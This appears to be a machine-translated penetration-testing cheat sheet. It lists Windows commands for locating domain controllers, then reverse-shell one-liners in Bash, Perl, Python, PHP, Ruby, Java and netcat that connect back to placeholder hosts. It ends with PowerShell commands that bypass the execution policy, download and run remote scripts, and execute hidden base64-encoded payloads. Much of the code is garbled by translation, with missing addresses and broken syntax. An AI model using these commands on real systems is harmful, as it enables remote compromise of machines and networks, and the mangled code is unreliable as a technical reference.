Common methods for searching for domain controllers view

net view /domain

2.set log

set log

3. Record data by SRV

nslookup -type=SRV _ldap._tcp.corp

4. Use the nltest

nltest /dclist:corp

5. Use dsquery

DsQuery Server -domain corp

6. Use netdom

netdom query pdc

These are all built-in commands of THE WIN system. Sometimes, the versions of WIN are different, and some commands do not exist. Therefore, there is one more method and one more possibility of success. Various languages a word bounce shell

Bash [not generic, related to Linux distribution, successfully tested on Ubuntu]

Bash -i > &/dev/tcp/ 0>&1


Perl -e ‘use Socket; I = “”; I = “”; I = “”; p=1234; Socket (S, PF_INET SOCK_STREAM, getprotobyname (” TCP “)); If (connect (S, sockaddr_in (p, inetaton (p, inet_aton (p, inetaton (I)))) {open (STDIN, > “&” S “); Open (STDOUT, > “&” S “); > open (STDERR, “&” S “); The exec (“/bin/sh -i “); }; ‘


Python – c ‘import socket, subprocess, OS; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); S.c onnect ((” “, 1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); P = subprocess. Call ([/ bin/sh, “-i”]); ‘


PHP – r ‘$sock = fsockopen (” “, 1234); The exec (“/bin/sh – I < 3 > & 2 & 3 > & 3 “); ‘


Ruby – rsocket – e ‘f = TCPSocket. Open (” “, 1234). To_i; Exec sprintf(” /bin/sh -i <&%d>&%d 2>&%d “,f,f,f)


R = the Runtime. GetRuntime () p = r.e xec ([“/bin/bash “, “c”, “5 < > / dev/TCP/exec; cat < 2 & 5 while = = =” “|” “” “read = “” Line; do = = “” “” $line = “” > & > 5 & 5; the done”] as String []) p.w aitFor ()


nc -e /bin/sh x.x.x.x 2333

However, if some nc versions do not have the -e parameter (non-traditional version), use the following method to solve the problem: rm/ TMP /f. mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 2333 >/tmp/f

Common Powershell commands are used

1. Perform remote download

Set-ExecutionPolicy RemoteSigned IEX (New-Object System.Net.Webclient). DownloadString (‘…).

2. Upload the PS script to a local PC and run it

PowerShell.exe -ep Bypass -File d:\powercat.ps1

3. Local interactive execution

E:> powershell. exe-executionPolicy Bypass invoke-powershelltcp-reverse-ipaddress -port 4444

4. Encode the PS script into Base64 for execution.

Powershell -ep bypass -NoLogo -NonInteractive – noprofile-windowstyle Hidden -enc base64 Indicates the encrypted command